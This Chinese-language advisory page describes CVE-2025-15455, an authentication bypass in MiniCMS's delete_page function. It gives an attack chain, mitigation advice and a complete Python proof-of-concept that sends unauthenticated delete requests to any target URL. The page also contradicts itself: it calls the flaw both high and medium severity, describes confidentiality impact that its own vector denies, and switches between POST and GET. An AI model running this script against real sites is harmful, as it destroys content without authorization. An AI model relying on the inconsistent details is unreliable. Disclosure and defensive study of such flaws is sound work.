CVE-2025-15455 MiniCMS delete_page函数认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-15455

漏洞类型

认证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

bg5sbk MiniCMS

漏洞概述

CVE-2025-15455是bg5sbk MiniCMS存在的一个高危认证绕过漏洞。该漏洞影响MiniCMS从初始版本到1.8的所有版本。漏洞位于管理后台的页面管理功能中，具体问题出在/minicms/mc-admin/page.php文件的delete_page函数。由于该函数存在不当的认证检查机制，攻击者可以在无需任何身份验证的情况下，远程调用该函数删除网站页面内容。

该漏洞的CVSS评分为6.5，属于中等严重程度。从CVSS向量CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L可以看出，攻击复杂度低，无需特权和用户交互即可利用，攻击者可通过网络直接发起攻击。虽然对机密性和完整性影响较低，但成功利用仍可导致网站内容被非法删除，影响网站正常运行和服务可用性。

该漏洞于2026年1月5日被公开披露，发现者为vuldb.com安全研究团队。漏洞详情和利用代码已公开发布，攻击者可以轻易获取并使用。值得注意的是，漏洞发现者在早期已尝试联系厂商报告此问题，但未获得任何回应，厂商可能已停止维护或不再积极响应安全问题。鉴于漏洞已公开且利用条件简单，建议使用受影响版本MiniCMS的用户尽快采取防护措施。

技术细节

该漏洞属于OWASP Top 10中的Broken Authentication类别，是一种典型的认证机制缺陷。漏洞产生的根本原因在于/minicms/mc-admin/page.php文件中的delete_page函数缺少对用户身份的有效验证。

在正常的安全设计中，删除页面的操作应当验证用户是否具有管理员权限，通常通过检查会话令牌、Cookie或服务器端的权限标识来实现。然而，MiniCMS的delete_page函数在处理删除请求时，未正确实现这些安全检查。具体表现为：函数直接处理来自用户请求的参数，而没有先验证请求发起者是否已登录且具有删除页面的权限。

攻击者可以通过构造恶意的HTTP请求，直接向管理后台的页面删除接口发送请求。由于缺少认证检查，服务器会直接执行删除操作。攻击者只需知道或猜测目标网站的页面ID，即可通过类似如下的请求删除任意页面：POST /minicms/mc-admin/page.php?action=delete&id=[page_id]。

该漏洞的影响范围仅限于数据删除，不会导致服务器被完全控制或敏感数据泄露。但由于删除操作针对的是数据库中的页面记录，成功利用后可能导致网站内容丢失，影响业务连续性。此外，攻击者可能通过批量删除页面来实施拒绝服务攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站是否使用MiniCMS CMS系统，检查网站路径中是否存在/minicms/mc-admin/管理后台入口

STEP 2

步骤2

攻击者访问/minicms/mc-admin/page.php页面，识别delete_page函数的存在和参数格式

STEP 3

步骤3

攻击者构造恶意的HTTP GET请求，参数包含action=delete和目标页面ID，无需提供任何认证凭据

STEP 4

步骤4

服务器端delete_page函数接收请求后，由于缺少认证检查，直接执行数据库删除操作

STEP 5

步骤5

攻击者通过批量请求删除多个页面，实现对网站内容的完全破坏，完成攻击目标

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15455 PoC - MiniCMS Authentication Bypass in delete_page
# Target: MiniCMS <= 1.8
# Component: /minicms/mc-admin/page.php delete_page function

def exploit(target_url, page_id):
    """
    Exploit for MiniCMS delete_page improper authentication vulnerability.
    This PoC demonstrates how an unauthenticated attacker can delete pages.
    
    Args:
        target_url: Base URL of the vulnerable MiniCMS installation
        page_id: ID of the page to delete
    
    Returns:
        bool: True if deletion appears successful, False otherwise
    """
    
    # Construct the delete page endpoint
    delete_endpoint = f"{target_url.rstrip('/')}/minicms/mc-admin/page.php"
    
    # Prepare the malicious request
    # The delete_page function doesn't validate authentication
    params = {
        'action': 'delete',
        'id': page_id
    }
    
    print(f"[*] Target: {target_url}")
    print(f"[*] Attempting to delete page ID: {page_id}")
    print(f"[*] Sending request to: {delete_endpoint}")
    
    try:
        # Send the request without any authentication
        # PR:N (No Privileges Required) - this is the vulnerability
        response = requests.get(delete_endpoint, params=params, timeout=10)
        
        print(f"[*] Response Status: {response.status_code}")
        
        # Check for indicators of successful deletion
        if response.status_code == 200:
            # Analyze response content
            if 'success' in response.text.lower() or 'deleted' in response.text.lower():
                print("[+] Page deletion appears successful!")
                return True
            elif 'error' in response.text.lower() or 'fail' in response.text.lower():
                print("[-] Server returned an error message")
                return False
            else:
                # Response received but content unclear
                print("[!] Request completed but result uncertain")
                return None
        else:
            print(f"[-] Unexpected HTTP status code: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {str(e)}")
        return False

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-15455.py <target_url> <page_id>")
        print("Example: python cve-2025-15455.py http://target.com/minicms 1")
        sys.exit(1)
    
    target = sys.argv[1]
    page_id = sys.argv[2]
    
    result = exploit(target, page_id)
    
    if result is True:
        print("\n[!] Vulnerability confirmed - authentication bypass successful")
        sys.exit(0)
    else:
        print("\n[-] Exploitation may have failed")
        sys.exit(1)

if __name__ == "__main__":
    main()

影响范围

bg5sbk MiniCMS <= 1.8

防御指南

临时缓解措施

由于该漏洞利用简单且已公开，建议立即采取以下临时缓解措施：1)使用Web服务器配置限制对/minicms/mc-admin/路径的访问，仅允许受信任的IP地址访问管理后台；2)暂时禁用page.php的删除功能或将其重命名以阻止直接访问；3)部署Web应用防火墙规则，检测和阻止异常的action=delete参数请求；4)对数据库实施每日备份，确保数据可恢复；5)监控服务器日志，关注异常的页面删除操作记录。长期来看，应等待官方发布安全补丁或考虑迁移到其他活跃维护的CMS系统。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15455
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15455
3 Details https://www.cvedetails.com/cve/CVE-2025-15455/
4 VulDB https://vuldb.com/cve/CVE-2025-15455
5 Link https://github.com/ueh1013/VULN/issues/14
6 Link https://vuldb.com/?ctiid.339488
7 Link https://vuldb.com/?id.339488
8 Link https://vuldb.com/?submit.725137